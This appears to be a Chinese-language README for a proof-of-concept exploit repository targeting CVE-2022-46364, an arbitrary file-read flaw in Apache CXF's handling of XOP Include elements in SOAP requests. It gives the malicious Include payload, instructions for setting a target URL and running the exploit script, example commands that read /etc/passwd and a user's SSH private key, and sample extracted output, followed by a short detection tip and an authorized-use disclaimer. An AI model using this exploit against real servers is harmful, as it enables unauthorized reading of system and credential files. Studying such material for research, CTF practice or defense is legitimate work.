本仓库包含针对 CVE-2022-46364 的概念验证 (PoC) 利用程序,这是 Apache CXF 中的一个本地文件包含 (LFI) 漏洞。
该漏洞是由于 SOAP 请求中 XOP(XML 二进制优化打包)Include 元素处理不当引起的,允许攻击者读取服务器上的任意文件。
Apache CXF 不正确处理 SOAP 请求中的 <xop:Include> 元素。通过提供特制的 href(例如 file:///etc/passwd),服务器可能包含并返回本地文件内容。
请始终确认目标环境中的确切受影响版本。
<xop:Include href="file:///path/to/file">.
├── cxf_lfi.sh # Exploit script
├── README.md # Documentation
├── LICENSE # MIT License
└── .gitignore
chmod +x cxf_lfi.sh
更新脚本中的目标:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
file:// 协议监控包含以下内容的异常 SOAP 请求:
<xop:Include>file:// URIs本项目仅供:
切勿在未经明确许可的系统上使用此工具。
作为安全研究和 CTF 实践的一部分开发。